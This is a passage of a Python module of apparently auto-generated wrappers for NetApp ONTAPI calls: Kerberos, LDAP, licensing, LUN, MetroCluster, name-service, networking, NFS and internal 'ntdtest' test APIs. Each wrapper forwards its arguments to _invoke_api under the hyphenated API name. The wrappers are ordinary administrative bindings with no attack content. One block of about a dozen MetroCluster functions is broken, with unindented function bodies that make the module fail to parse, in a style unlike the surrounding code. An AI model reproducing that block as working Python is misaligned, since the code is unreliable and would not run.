def job_unclaim_iter(*args):
    return _invoke_api('job-unclaim-iter', *args)
# Kerberos/LDAP/license/lock ZAPI wrappers: each forwards *args straight to
# _invoke_api with the hyphenated API name and returns the raw API result.
def kerberos_config_get_iter(*args):
    return _invoke_api('kerberos-config-get-iter', *args)
def kerberos_realm_create(*args):
    return _invoke_api('kerberos-realm-create', *args)
def kerberos_realm_delete(*args):
    return _invoke_api('kerberos-realm-delete', *args)
def kerberos_realm_get_iter(*args):
    return _invoke_api('kerberos-realm-get-iter', *args)
def kerberos_realm_modify(*args):
    return _invoke_api('kerberos-realm-modify', *args)
def ldap_client_get_iter(*args):
    return _invoke_api('ldap-client-get-iter', *args)
def ldap_client_schema_get_iter(*args):
    return _invoke_api('ldap-client-schema-get-iter', *args)
def ldap_config_get_iter(*args):
    return _invoke_api('ldap-config-get-iter', *args)
def license_v2_add(*args):
    return _invoke_api('license-v2-add', *args)
def license_v2_cleanup_list_info(*args):
    return _invoke_api('license-v2-cleanup-list-info', *args)
def license_v2_delete(*args):
    return _invoke_api('license-v2-delete', *args)
def license_v2_delete_expired(*args):
    return _invoke_api('license-v2-delete-expired', *args)
def license_v2_delete_unused(*args):
    return _invoke_api('license-v2-delete-unused', *args)
def license_v2_entitlement_risk_get_iter(*args):
    return _invoke_api('license-v2-entitlement-risk-get-iter', *args)
def license_v2_list_info(*args):
    return _invoke_api('license-v2-list-info', *args)
def license_v2_status_list_info(*args):
    return _invoke_api('license-v2-status-list-info', *args)
def lock_break_iter(*args):
    return _invoke_api('lock-break-iter', *args)
def lock_get_iter(*args):
    return _invoke_api('lock-get-iter', *args)
# LUN-family ZAPI wrappers: each forwards *args straight to _invoke_api
# with the hyphenated API name and returns the raw API result.
def lun_alignment_get_iter(*args):
    return _invoke_api('lun-alignment-get-iter', *args)
def lun_bind_get_iter(*args):
    return _invoke_api('lun-bind-get-iter', *args)
def lun_copy_cancel(*args):
    return _invoke_api('lun-copy-cancel', *args)
def lun_copy_get_iter(*args):
    return _invoke_api('lun-copy-get-iter', *args)
def lun_copy_modify(*args):
    return _invoke_api('lun-copy-modify', *args)
def lun_copy_pause(*args):
    return _invoke_api('lun-copy-pause', *args)
def lun_copy_resume(*args):
    return _invoke_api('lun-copy-resume', *args)
def lun_copy_start(*args):
    return _invoke_api('lun-copy-start', *args)
def lun_debug_get(*args):
    return _invoke_api('lun-debug-get', *args)
def lun_get_iter(*args):
    return _invoke_api('lun-get-iter', *args)
def lun_get_vdisk_attributes(*args):
    return _invoke_api('lun-get-vdisk-attributes', *args)
def lun_group_internal_rebuild(*args):
    return _invoke_api('lun-group-internal-rebuild', *args)
def lun_import_create(*args):
    return _invoke_api('lun-import-create', *args)
def lun_import_delete(*args):
    return _invoke_api('lun-import-delete', *args)
def lun_import_get_iter(*args):
    return _invoke_api('lun-import-get-iter', *args)
def lun_import_pause(*args):
    return _invoke_api('lun-import-pause', *args)
def lun_import_resume(*args):
    return _invoke_api('lun-import-resume', *args)
def lun_import_start(*args):
    return _invoke_api('lun-import-start', *args)
def lun_import_stop(*args):
    return _invoke_api('lun-import-stop', *args)
def lun_import_throttle(*args):
    return _invoke_api('lun-import-throttle', *args)
def lun_import_verify_start(*args):
    return _invoke_api('lun-import-verify-start', *args)
def lun_import_verify_stop(*args):
    return _invoke_api('lun-import-verify-stop', *args)
def lun_initiator_list_map_info(*args):
    return _invoke_api('lun-initiator-list-map-info', *args)
def lun_map_get_iter(*args):
    return _invoke_api('lun-map-get-iter', *args)
def lun_move_get_iter(*args):
    return _invoke_api('lun-move-get-iter', *args)
def lun_os_type_list(*args):
    return _invoke_api('lun-os-type-list', *args)
def lun_prepare_to_downgrade(*args):
    return _invoke_api('lun-prepare-to-downgrade', *args)
def lun_stats_get_iter(*args):
    return _invoke_api('lun-stats-get-iter', *args)
def lun_test_vdisk_size(*args):
    return _invoke_api('lun-test-vdisk-size', *args)
def lun_transition_7mode_destroy(*args):
    return _invoke_api('lun-transition-7mode-destroy', *args)
def lun_transition_7mode_get_iter(*args):
    return _invoke_api('lun-transition-7mode-get-iter', *args)
def lun_transition_start(*args):
    return _invoke_api('lun-transition-start', *args)
def lun_transition_volume_get_iter(*args):
    return _invoke_api('lun-transition-volume-get-iter', *args)
# Miscellaneous ZAPI wrappers: each forwards *args straight to _invoke_api
# with the hyphenated API name and returns the raw API result.
def memoryperf_run(*args):
    return _invoke_api('memoryperf-run', *args)
def method_for_key_optionality_default(*args):
    return _invoke_api('method-for-key-optionality-default', *args)
# MetroCluster ZAPI wrappers: each forwards *args straight to _invoke_api
# with the hyphenated API name and returns the raw API result.
def metrocluster_check_aggregate_eligibility_get(*args):
    return _invoke_api('metrocluster-check-aggregate-eligibility-get', *args)
def metrocluster_check_aggregate_eligibility_get_iter(*args):
    return _invoke_api('metrocluster-check-aggregate-eligibility-get-iter', *args)
def metrocluster_check_aggregate_get_iter(*args):
    return _invoke_api('metrocluster-check-aggregate-get-iter', *args)
def metrocluster_check_capture_status_get(*args):
    return _invoke_api('metrocluster-check-capture-status-get', *args)
def metrocluster_check_cluster_get_iter(*args):
    return _invoke_api('metrocluster-check-cluster-get-iter', *args)
def metrocluster_check_config_replication_get(*args):
    return _invoke_api('metrocluster-check-config-replication-get', *args)
def metrocluster_check_get_iter(*args):
    return _invoke_api('metrocluster-check-get-iter', *args)
def metrocluster_check_lif_repair_placement(*args):
    return _invoke_api('metrocluster-check-lif-repair-placement', *args)
def metrocluster_check_node_get_iter(*args):
    return _invoke_api('metrocluster-check-node-get-iter', *args)
def metrocluster_check_run(*args):
    return _invoke_api('metrocluster-check-run', *args)
def metrocluster_config_diff_get(*args):
    return _invoke_api('metrocluster-config-diff-get', *args)
def metrocluster_config_diff_get_iter(*args):
    return _invoke_api('metrocluster-config-diff-get-iter', *args)
def metrocluster_config_replication_cluster_storage_configuration_get(*args):
    return _invoke_api('metrocluster-config-replication-cluster-storage-configuration-get', *args)
def metrocluster_config_replication_cluster_storage_configuration_modify(*args):
    return _invoke_api('metrocluster-config-replication-cluster-storage-configuration-modify', *args)
def metrocluster_config_replication_resync_status_get(*args):
    return _invoke_api('metrocluster-config-replication-resync-status-get', *args)
def metrocluster_configure(*args):
    return _invoke_api('metrocluster-configure', *args)
def metrocluster_disable(*args):
    return _invoke_api('metrocluster-disable', *args)
def metrocluster_get(*args):
    return _invoke_api('metrocluster-get', *args)
def metrocluster_heal(*args):
    return _invoke_api('metrocluster-heal', *args)
def metrocluster_interconnect_adapter_auto_reset_on_error_modify(*args):
    return _invoke_api('metrocluster-interconnect-adapter-auto-reset-on-error-modify', *args)
def metrocluster_interconnect_adapter_get_iter(*args):
    return _invoke_api('metrocluster-interconnect-adapter-get-iter', *args)
def metrocluster_interconnect_adapter_modify(*args):
    return _invoke_api('metrocluster-interconnect-adapter-modify', *args)
def metrocluster_interconnect_adapter_reset(*args):
    return _invoke_api('metrocluster-interconnect-adapter-reset', *args)
def metrocluster_interconnect_mirror_get_iter(*args):
    return _invoke_api('metrocluster-interconnect-mirror-get-iter', *args)
def metrocluster_interconnect_mirror_modify(*args):
    return _invoke_api('metrocluster-interconnect-mirror-modify', *args)
def metrocluster_interconnect_mirror_multipath_get_iter(*args):
api_call = _invoke_api('metrocluster-interconnect-mirror-multipath-get-iter', *args)
return api_call
def metrocluster_is_configured(*args):
api_call = _invoke_api('metrocluster-is-configured', *args)
return api_call
def metrocluster_node_get_iter(*args):
api_call = _invoke_api('metrocluster-node-get-iter', *args)
return api_call
def metrocluster_operation_get_iter(*args):
api_call = _invoke_api('metrocluster-operation-get-iter', *args)
return api_call
def metrocluster_progress_table_get_iter(*args):
api_call = _invoke_api('metrocluster-progress-table-get-iter', *args)
return api_call
def metrocluster_show_lif_placement_failures_get_iter(*args):
api_call = _invoke_api('metrocluster-show-lif-placement-failures-get-iter', *args)
return api_call
def metrocluster_switchback(*args):
api_call = _invoke_api('metrocluster-switchback', *args)
return api_call
def metrocluster_switchover(*args):
api_call = _invoke_api('metrocluster-switchover', *args)
return api_call
def metrocluster_tracelog_dump(*args):
api_call = _invoke_api('metrocluster-tracelog-dump', *args)
return api_call
def metrocluster_unconfigure(*args):
api_call = _invoke_api('metrocluster-unconfigure', *args)
return api_call
def metrocluster_vserver_get_iter(*args):
api_call = _invoke_api('metrocluster-vserver-get-iter', *args)
return api_call
def metrocluster_vserver_resync(*args):
api_call = _invoke_api('metrocluster-vserver-resync', *args)
return api_call
# Generated ONTAPI wrappers for the name-mapping / name-service APIs: each
# function forwards *args to _invoke_api() with its dash-separated call name.
def name_mapping_get_iter(*args):
    return _invoke_api('name-mapping-get-iter', *args)
def name_mapping_unix_group_get_iter(*args):
    return _invoke_api('name-mapping-unix-group-get-iter', *args)
def name_mapping_unix_user_get_iter(*args):
    return _invoke_api('name-mapping-unix-user-get-iter', *args)
def name_service_dns_statistics_get_iter(*args):
    return _invoke_api('name-service-dns-statistics-get-iter', *args)
def name_service_nis_binding_detail_get_iter(*args):
    return _invoke_api('name-service-nis-binding-detail-get-iter', *args)
def name_service_nis_show_bound_iter(*args):
    return _invoke_api('name-service-nis-show-bound-iter', *args)
def name_service_nis_statistics_get_iter(*args):
    return _invoke_api('name-service-nis-statistics-get-iter', *args)
def name_service_unix_group_limits_get(*args):
    return _invoke_api('name-service-unix-group-limits-get', *args)
def name_service_unix_user_limits_get(*args):
    return _invoke_api('name-service-unix-user-limits-get', *args)
def nameservice_dns_statistics_clear(*args):
    return _invoke_api('nameservice-dns-statistics-clear', *args)
def nameservice_get_hostname_from_ipv4(*args):
    return _invoke_api('nameservice-get-hostname-from-ipv4', *args)
def nameservice_get_ip_from_hostname(*args):
    return _invoke_api('nameservice-get-ip-from-hostname', *args)
def nameservice_get_ipv4_from_hostname(*args):
    return _invoke_api('nameservice-get-ipv4-from-hostname', *args)
def nameservice_nis_statistics_clear(*args):
    return _invoke_api('nameservice-nis-statistics-clear', *args)
def nameservice_nsswitch_get_iter(*args):
    return _invoke_api('nameservice-nsswitch-get-iter', *args)
# Generated ONTAPI wrappers for the 'net-*' API family: each function
# forwards *args to _invoke_api() with its dash-separated call name.
def net_active_routes_get_iter(*args):
    return _invoke_api('net-active-routes-get-iter', *args)
def net_arp_active_entry_destroy(*args):
    return _invoke_api('net-arp-active-entry-destroy', *args)
def net_arp_active_entry_get(*args):
    return _invoke_api('net-arp-active-entry-get', *args)
def net_arp_active_entry_get_iter(*args):
    return _invoke_api('net-arp-active-entry-get-iter', *args)
def net_arp_create(*args):
    return _invoke_api('net-arp-create', *args)
def net_arp_destroy(*args):
    return _invoke_api('net-arp-destroy', *args)
def net_arp_get(*args):
    return _invoke_api('net-arp-get', *args)
def net_arp_get_iter(*args):
    return _invoke_api('net-arp-get-iter', *args)
def net_check_failover(*args):
    return _invoke_api('net-check-failover', *args)
def net_cluster_ping(*args):
    return _invoke_api('net-cluster-ping', *args)
def net_cluster_ping6(*args):
    return _invoke_api('net-cluster-ping6', *args)
def net_connections_receive_window_size_get(*args):
    return _invoke_api('net-connections-receive-window-size-get', *args)
def net_connections_receive_window_size_get_iter(*args):
    return _invoke_api('net-connections-receive-window-size-get-iter', *args)
def net_connections_receive_window_size_modify(*args):
    return _invoke_api('net-connections-receive-window-size-modify', *args)
def net_ddns_get_iter(*args):
    return _invoke_api('net-ddns-get-iter', *args)
def net_device_discovery_get_iter(*args):
    return _invoke_api('net-device-discovery-get-iter', *args)
def net_disable_readonly(*args):
    return _invoke_api('net-disable-readonly', *args)
def net_dns_get_iter(*args):
    return _invoke_api('net-dns-get-iter', *args)
def net_enable_readonly(*args):
    return _invoke_api('net-enable-readonly', *args)
def net_failover_group_add_targets(*args):
    return _invoke_api('net-failover-group-add-targets', *args)
def net_failover_group_create(*args):
    return _invoke_api('net-failover-group-create', *args)
def net_failover_group_destroy(*args):
    return _invoke_api('net-failover-group-destroy', *args)
def net_failover_group_get_iter(*args):
    return _invoke_api('net-failover-group-get-iter', *args)
def net_failover_group_modify(*args):
    return _invoke_api('net-failover-group-modify', *args)
def net_failover_group_remove_targets(*args):
    return _invoke_api('net-failover-group-remove-targets', *args)
def net_failover_group_rename(*args):
    return _invoke_api('net-failover-group-rename', *args)
def net_firewall_config_get(*args):
    return _invoke_api('net-firewall-config-get', *args)
def net_firewall_config_get_iter(*args):
    return _invoke_api('net-firewall-config-get-iter', *args)
def net_firewall_config_modify(*args):
    return _invoke_api('net-firewall-config-modify', *args)
def net_firewall_config_modify_iter(*args):
    return _invoke_api('net-firewall-config-modify-iter', *args)
def net_firewall_policy_create(*args):
    return _invoke_api('net-firewall-policy-create', *args)
def net_firewall_policy_destroy(*args):
    return _invoke_api('net-firewall-policy-destroy', *args)
def net_firewall_policy_get_iter(*args):
    return _invoke_api('net-firewall-policy-get-iter', *args)
def net_firewall_policy_modify(*args):
    return _invoke_api('net-firewall-policy-modify', *args)
def net_hosts_get_iter(*args):
    return _invoke_api('net-hosts-get-iter', *args)
def net_interface_create(*args):
    return _invoke_api('net-interface-create', *args)
def net_interface_delete(*args):
    return _invoke_api('net-interface-delete', *args)
def net_interface_get_iter(*args):
    return _invoke_api('net-interface-get-iter', *args)
def net_interface_migrate(*args):
    return _invoke_api('net-interface-migrate', *args)
def net_interface_modify(*args):
    return _invoke_api('net-interface-modify', *args)
def net_interface_modify_iter(*args):
    return _invoke_api('net-interface-modify-iter', *args)
def net_interface_revert(*args):
    return _invoke_api('net-interface-revert', *args)
def net_ipspaces_assign_vserver(*args):
    return _invoke_api('net-ipspaces-assign-vserver', *args)
def net_ipspaces_create(*args):
    return _invoke_api('net-ipspaces-create', *args)
def net_ipspaces_destroy(*args):
    return _invoke_api('net-ipspaces-destroy', *args)
def net_ipspaces_get(*args):
    return _invoke_api('net-ipspaces-get', *args)
def net_ipspaces_get_iter(*args):
    return _invoke_api('net-ipspaces-get-iter', *args)
def net_ipspaces_rename(*args):
    return _invoke_api('net-ipspaces-rename', *args)
def net_ndp_active_neighbor_destroy(*args):
    return _invoke_api('net-ndp-active-neighbor-destroy', *args)
def net_ndp_active_neighbor_get(*args):
    return _invoke_api('net-ndp-active-neighbor-get', *args)
def net_ndp_active_neighbor_get_iter(*args):
    return _invoke_api('net-ndp-active-neighbor-get-iter', *args)
def net_ndp_default_router_delete_all(*args):
    return _invoke_api('net-ndp-default-router-delete-all', *args)
def net_ndp_default_router_get(*args):
    return _invoke_api('net-ndp-default-router-get', *args)
def net_ndp_default_router_get_iter(*args):
    return _invoke_api('net-ndp-default-router-get-iter', *args)
def net_ndp_neighbor_get_iter(*args):
    return _invoke_api('net-ndp-neighbor-get-iter', *args)
def net_ndp_prefix_delete_all(*args):
    return _invoke_api('net-ndp-prefix-delete-all', *args)
def net_ndp_prefix_get(*args):
    return _invoke_api('net-ndp-prefix-get', *args)
def net_ndp_prefix_get_iter(*args):
    return _invoke_api('net-ndp-prefix-get-iter', *args)
def net_options_get(*args):
    return _invoke_api('net-options-get', *args)
def net_options_modify(*args):
    return _invoke_api('net-options-modify', *args)
def net_placement_cache_delete(*args):
    return _invoke_api('net-placement-cache-delete', *args)
def net_placement_cache_get_iter(*args):
    return _invoke_api('net-placement-cache-get-iter', *args)
def net_placement_discover(*args):
    return _invoke_api('net-placement-discover', *args)
def net_port_broadcast_domain_add_ports(*args):
    return _invoke_api('net-port-broadcast-domain-add-ports', *args)
def net_port_broadcast_domain_create(*args):
    return _invoke_api('net-port-broadcast-domain-create', *args)
def net_port_broadcast_domain_destroy(*args):
    return _invoke_api('net-port-broadcast-domain-destroy', *args)
def net_port_broadcast_domain_get(*args):
    return _invoke_api('net-port-broadcast-domain-get', *args)
def net_port_broadcast_domain_get_iter(*args):
    return _invoke_api('net-port-broadcast-domain-get-iter', *args)
def net_port_broadcast_domain_merge(*args):
    return _invoke_api('net-port-broadcast-domain-merge', *args)
def net_port_broadcast_domain_modify(*args):
    return _invoke_api('net-port-broadcast-domain-modify', *args)
def net_port_broadcast_domain_remove_ports(*args):
    return _invoke_api('net-port-broadcast-domain-remove-ports', *args)
def net_port_broadcast_domain_rename(*args):
    return _invoke_api('net-port-broadcast-domain-rename', *args)
def net_port_broadcast_domain_split(*args):
    return _invoke_api('net-port-broadcast-domain-split', *args)
def net_port_delete(*args):
    return _invoke_api('net-port-delete', *args)
def net_port_get(*args):
    return _invoke_api('net-port-get', *args)
def net_port_get_iter(*args):
    return _invoke_api('net-port-get-iter', *args)
def net_port_ifgrp_add_port(*args):
    return _invoke_api('net-port-ifgrp-add-port', *args)
def net_port_ifgrp_create(*args):
    return _invoke_api('net-port-ifgrp-create', *args)
def net_port_ifgrp_destroy(*args):
    return _invoke_api('net-port-ifgrp-destroy', *args)
def net_port_ifgrp_get(*args):
    return _invoke_api('net-port-ifgrp-get', *args)
def net_port_ifgrp_remove_port(*args):
    return _invoke_api('net-port-ifgrp-remove-port', *args)
def net_port_modify(*args):
    return _invoke_api('net-port-modify', *args)
def net_port_modify_iter(*args):
    return _invoke_api('net-port-modify-iter', *args)
def net_routes_get_iter(*args):
    return _invoke_api('net-routes-get-iter', *args)
def net_routes_lifs_get_iter(*args):
    return _invoke_api('net-routes-lifs-get-iter', *args)
def net_routing_group_route_create(*args):
    return _invoke_api('net-routing-group-route-create', *args)
def net_routing_group_route_destroy(*args):
    return _invoke_api('net-routing-group-route-destroy', *args)
def net_routing_group_route_get_iter(*args):
    return _invoke_api('net-routing-group-route-get-iter', *args)
def net_san_lif_placement_get(*args):
    return _invoke_api('net-san-lif-placement-get', *args)
def net_subnet_add_ranges(*args):
    return _invoke_api('net-subnet-add-ranges', *args)
def net_subnet_create(*args):
    return _invoke_api('net-subnet-create', *args)
def net_subnet_destroy(*args):
    return _invoke_api('net-subnet-destroy', *args)
def net_subnet_get(*args):
    return _invoke_api('net-subnet-get', *args)
def net_subnet_get_iter(*args):
    return _invoke_api('net-subnet-get-iter', *args)
def net_subnet_modify(*args):
    return _invoke_api('net-subnet-modify', *args)
def net_subnet_remove_ranges(*args):
    return _invoke_api('net-subnet-remove-ranges', *args)
def net_subnet_rename(*args):
    return _invoke_api('net-subnet-rename', *args)
def net_traceroute6(*args):
    return _invoke_api('net-traceroute6', *args)
def net_vlan_create(*args):
    return _invoke_api('net-vlan-create', *args)
def net_vlan_delete(*args):
    return _invoke_api('net-vlan-delete', *args)
def net_vlan_get(*args):
    return _invoke_api('net-vlan-get', *args)
def net_vlan_get_iter(*args):
    return _invoke_api('net-vlan-get-iter', *args)
# Generated ONTAPI wrappers for the netgroups/nfs/nis APIs: each function
# forwards *args to _invoke_api() with its dash-separated call name.
def netgroups_file_delete(*args):
    return _invoke_api('netgroups-file-delete', *args)
def netgroups_file_get(*args):
    return _invoke_api('netgroups-file-get', *args)
def netgroups_file_get_iter(*args):
    return _invoke_api('netgroups-file-get-iter', *args)
def nfs_all_flash_optimized_get(*args):
    return _invoke_api('nfs-all-flash-optimized-get', *args)
def nfs_all_flash_optimized_get_iter(*args):
    return _invoke_api('nfs-all-flash-optimized-get-iter', *args)
def nfs_service_get_create_defaults(*args):
    return _invoke_api('nfs-service-get-create-defaults', *args)
def nfs_service_get_iter(*args):
    return _invoke_api('nfs-service-get-iter', *args)
def nis_get_iter(*args):
    return _invoke_api('nis-get-iter', *args)
# Generated ONTAPI wrappers for the 'ntdtest-*' (test) API family: each
# function forwards *args to _invoke_api() with its dash-separated call name.
def ntdtest_action_alt_simpleget(*args):
    return _invoke_api('ntdtest-action-alt-simpleget', *args)
def ntdtest_action_alt_simpleget_optional(*args):
    return _invoke_api('ntdtest-action-alt-simpleget-optional', *args)
def ntdtest_action_only_doit(*args):
    return _invoke_api('ntdtest-action-only-doit', *args)
def ntdtest_action_only_doit_async(*args):
    return _invoke_api('ntdtest-action-only-doit-async', *args)
def ntdtest_action_only_dothat(*args):
    return _invoke_api('ntdtest-action-only-dothat', *args)
def ntdtest_action_simpleget(*args):
    return _invoke_api('ntdtest-action-simpleget', *args)
def ntdtest_action_top_level_create(*args):
    return _invoke_api('ntdtest-action-top-level-create', *args)
def ntdtest_action_top_level_create_alt(*args):
    return _invoke_api('ntdtest-action-top-level-create-alt', *args)
def ntdtest_dnested_get(*args):
    return _invoke_api('ntdtest-dnested-get', *args)
def ntdtest_dnested_get_iter(*args):
    return _invoke_api('ntdtest-dnested-get-iter', *args)
def ntdtest_empty_tags_get_1(*args):
    return _invoke_api('ntdtest-empty-tags-get-1', *args)
def ntdtest_empty_tags_get_10(*args):
    return _invoke_api('ntdtest-empty-tags-get-10', *args)
def ntdtest_empty_tags_get_11(*args):
    return _invoke_api('ntdtest-empty-tags-get-11', *args)
def ntdtest_empty_tags_get_12(*args):
    return _invoke_api('ntdtest-empty-tags-get-12', *args)
def ntdtest_empty_tags_get_13(*args):
    return _invoke_api('ntdtest-empty-tags-get-13', *args)
def ntdtest_empty_tags_get_2(*args):
    return _invoke_api('ntdtest-empty-tags-get-2', *args)
def ntdtest_empty_tags_get_3(*args):
    return _invoke_api('ntdtest-empty-tags-get-3', *args)
def ntdtest_empty_tags_get_4(*args):
    return _invoke_api('ntdtest-empty-tags-get-4', *args)
def ntdtest_empty_tags_get_5(*args):
    return _invoke_api('ntdtest-empty-tags-get-5', *args)
def ntdtest_empty_tags_get_6(*args):
    return _invoke_api('ntdtest-empty-tags-get-6', *args)
def ntdtest_empty_tags_get_7(*args):
    return _invoke_api('ntdtest-empty-tags-get-7', *args)
def ntdtest_empty_tags_get_8(*args):
    return _invoke_api('ntdtest-empty-tags-get-8', *args)
def ntdtest_empty_tags_get_9(*args):
    return _invoke_api('ntdtest-empty-tags-get-9', *args)
def ntdtest_extensive_alternate_create_1(*args):
    return _invoke_api('ntdtest-extensive-alternate-create-1', *args)
def ntdtest_extensive_alternate_create_2(*args):
    return _invoke_api('ntdtest-extensive-alternate-create-2', *args)
def ntdtest_extensive_alternate_destroy_1(*args):
    return _invoke_api('ntdtest-extensive-alternate-destroy-1', *args)
def ntdtest_extensive_alternate_get_1(*args):
    return _invoke_api('ntdtest-extensive-alternate-get-1', *args)
def ntdtest_extensive_alternate_get_2(*args):
    return _invoke_api('ntdtest-extensive-alternate-get-2', *args)
def ntdtest_extensive_alternate_modify_1(*args):
    return _invoke_api('ntdtest-extensive-alternate-modify-1', *args)
def ntdtest_extensive_default_create(*args):
    return _invoke_api('ntdtest-extensive-default-create', *args)
def ntdtest_extensive_default_destroy(*args):
    return _invoke_api('ntdtest-extensive-default-destroy', *args)
def ntdtest_extensive_default_get(*args):
    return _invoke_api('ntdtest-extensive-default-get', *args)
def ntdtest_extensive_default_modify(*args):
    return _invoke_api('ntdtest-extensive-default-modify', *args)
def ntdtest_extensive_destroy_iter(*args):
    return _invoke_api('ntdtest-extensive-destroy-iter', *args)
def ntdtest_extensive_get_iter(*args):
    return _invoke_api('ntdtest-extensive-get-iter', *args)
def ntdtest_extensive_method1_alternate(*args):
    return _invoke_api('ntdtest-extensive-method1-alternate', *args)
def ntdtest_extensive_method1_default(*args):
    return _invoke_api('ntdtest-extensive-method1-default', *args)
def ntdtest_extensive_method2_alternate(*args):
    return _invoke_api('ntdtest-extensive-method2-alternate', *args)
def ntdtest_extensive_method2_default(*args):
    return _invoke_api('ntdtest-extensive-method2-default', *args)
def ntdtest_extensive_method3_default(*args):
    return _invoke_api('ntdtest-extensive-method3-default', *args)
def ntdtest_extensive_method4_alt(*args):
    return _invoke_api('ntdtest-extensive-method4-alt', *args)
def ntdtest_extensive_method4_default(*args):
    return _invoke_api('ntdtest-extensive-method4-default', *args)
def ntdtest_extensive_method5_alternate(*args):
    return _invoke_api('ntdtest-extensive-method5-alternate', *args)
def ntdtest_extensive_method6_alternate(*args):
    return _invoke_api('ntdtest-extensive-method6-alternate', *args)
def ntdtest_extensive_method6_alternate_1(*args):
    return _invoke_api('ntdtest-extensive-method6-alternate-1', *args)
def ntdtest_extensive_method6_default(*args):
    return _invoke_api('ntdtest-extensive-method6-default', *args)
def ntdtest_extensive_modify_iter(*args):
    return _invoke_api('ntdtest-extensive-modify-iter', *args)
def ntdtest_folding_create(*args):
    return _invoke_api('ntdtest-folding-create', *args)
def ntdtest_folding_deep_arrayof_get_iter(*args):
    return _invoke_api('ntdtest-folding-deep-arrayof-get-iter', *args)
def ntdtest_folding_default_get(*args):
    return _invoke_api('ntdtest-folding-default-get', *args)
def ntdtest_folding_destroy(*args):
    return _invoke_api('ntdtest-folding-destroy', *args)
def ntdtest_folding_get(*args):
    return _invoke_api('ntdtest-folding-get', *args)
def ntdtest_folding_get_collapsed_and_arrayof(*args):
    return _invoke_api('ntdtest-folding-get-collapsed-and-arrayof', *args)
def ntdtest_folding_get_deep_element(*args):
    return _invoke_api('ntdtest-folding-get-deep-element', *args)
def ntdtest_folding_get_element_no_array(*args):
    return _invoke_api('ntdtest-folding-get-element-no-array', *args)
def ntdtest_folding_get_full_list(*args):
    return _invoke_api('ntdtest-folding-get-full-list', *args)
def ntdtest_folding_get_iter(*args):
    return _invoke_api('ntdtest-folding-get-iter', *args)
def ntdtest_folding_get_iter_mixed(*args):
    return _invoke_api('ntdtest-folding-get-iter-mixed', *args)
def ntdtest_folding_get_multiple_field_list_shallow(*args):
    return _invoke_api('ntdtest-folding-get-multiple-field-list-shallow', *args)
def ntdtest_folding_get_multiple_field_list_top(*args):
    return _invoke_api('ntdtest-folding-get-multiple-field-list-top', *args)
def ntdtest_folding_get_multiple_fields_list_array_and_collapsed(*args):
    return _invoke_api('ntdtest-folding-get-multiple-fields-list-array-and-collapsed', *args)
def ntdtest_folding_get_shallow_element(*args):
    return _invoke_api('ntdtest-folding-get-shallow-element', *args)
def ntdtest_folding_get_single_field_list(*args):
    return _invoke_api('ntdtest-folding-get-single-field-list', *args)
def ntdtest_folding_list_info(*args):
    return _invoke_api('ntdtest-folding-list-info', *args)
def ntdtest_folding_list_info_alt(*args):
    return _invoke_api('ntdtest-folding-list-info-alt', *args)
def ntdtest_folding_list_info_deep_element(*args):
    return _invoke_api('ntdtest-folding-list-info-deep-element', *args)
def ntdtest_folding_multiple_arrays_create(*args):
    return _invoke_api('ntdtest-folding-multiple-arrays-create', *args)
def ntdtest_folding_multiple_arrays_destroy(*args):
    return _invoke_api('ntdtest-folding-multiple-arrays-destroy', *args)
def ntdtest_folding_multiple_arrays_get_iter(*args):
    return _invoke_api('ntdtest-folding-multiple-arrays-get-iter', *args)
def ntdtest_get(*args):
    return _invoke_api('ntdtest-get', *args)
def ntdtest_get_iter(*args):
    return _invoke_api('ntdtest-get-iter', *args)
def ntdtest_iterfrom_alt_create(*args):
    return _invoke_api('ntdtest-iterfrom-alt-create', *args)
def ntdtest_iterfrom_alt_destroy(*args):
    return _invoke_api('ntdtest-iterfrom-alt-destroy', *args)
def ntdtest_iterfrom_alt_destroy_iter(*args):
    return _invoke_api('ntdtest-iterfrom-alt-destroy-iter', *args)
def ntdtest_iterfrom_alt_get(*args):
    return _invoke_api('ntdtest-iterfrom-alt-get', *args)
def ntdtest_iterfrom_alt_get_iter(*args):
    return _invoke_api('ntdtest-iterfrom-alt-get-iter', *args)
def ntdtest_iterfrom_alt_list_info(*args):
    return _invoke_api('ntdtest-iterfrom-alt-list-info', *args)
def ntdtest_iterfrom_alt_modify(*args):
    return _invoke_api('ntdtest-iterfrom-alt-modify', *args)
def ntdtest_iterfrom_alt_modify_iter(*args):
    return _invoke_api('ntdtest-iterfrom-alt-modify-iter', *args)
def ntdtest_iterfrom_create(*args):
    return _invoke_api('ntdtest-iterfrom-create', *args)
def ntdtest_iterfrom_destroy(*args):
    return _invoke_api('ntdtest-iterfrom-destroy', *args)
def ntdtest_iterfrom_destroy_iter(*args):
    return _invoke_api('ntdtest-iterfrom-destroy-iter', *args)
def ntdtest_iterfrom_dupe_create(*args):
    return _invoke_api('ntdtest-iterfrom-dupe-create', *args)
def ntdtest_iterfrom_dupe_destroy(*args):
    return _invoke_api('ntdtest-iterfrom-dupe-destroy', *args)
def ntdtest_iterfrom_dupe_destroy_iter(*args):
    return _invoke_api('ntdtest-iterfrom-dupe-destroy-iter', *args)
def ntdtest_iterfrom_dupe_get(*args):
    return _invoke_api('ntdtest-iterfrom-dupe-get', *args)
def ntdtest_iterfrom_dupe_get_iter(*args):
    return _invoke_api('ntdtest-iterfrom-dupe-get-iter', *args)
def ntdtest_iterfrom_dupe_list_info(*args):
    return _invoke_api('ntdtest-iterfrom-dupe-list-info', *args)
def ntdtest_iterfrom_dupe_modify(*args):
    return _invoke_api('ntdtest-iterfrom-dupe-modify', *args)
def ntdtest_iterfrom_dupe_modify_iter(*args):
    return _invoke_api('ntdtest-iterfrom-dupe-modify-iter', *args)
def ntdtest_iterfrom_get(*args):
    return _invoke_api('ntdtest-iterfrom-get', *args)
def ntdtest_iterfrom_get_iter(*args):
    return _invoke_api('ntdtest-iterfrom-get-iter', *args)
def ntdtest_iterfrom_list_info(*args):
    return _invoke_api('ntdtest-iterfrom-list-info', *args)
def ntdtest_iterfrom_modify(*args):
    return _invoke_api('ntdtest-iterfrom-modify', *args)
def ntdtest_iterfrom_modify_iter(*args):
    return _invoke_api('ntdtest-iterfrom-modify-iter', *args)
def ntdtest_iternoread_create(*args):
    return _invoke_api('ntdtest-iternoread-create', *args)
def ntdtest_iternoread_destroy(*args):
    return _invoke_api('ntdtest-iternoread-destroy', *args)
def ntdtest_iternoread_destroy_iter(*args):
    return _invoke_api('ntdtest-iternoread-destroy-iter', *args)
def ntdtest_iternoread_get(*args):
    return _invoke_api('ntdtest-iternoread-get', *args)
def ntdtest_iternoread_get_alt(*args):
    return _invoke_api('ntdtest-iternoread-get-alt', *args)
def ntdtest_iternoread_get_iter(*args):
    return _invoke_api('ntdtest-iternoread-get-iter', *args)
def ntdtest_iternoread_get_iter_alt(*args):
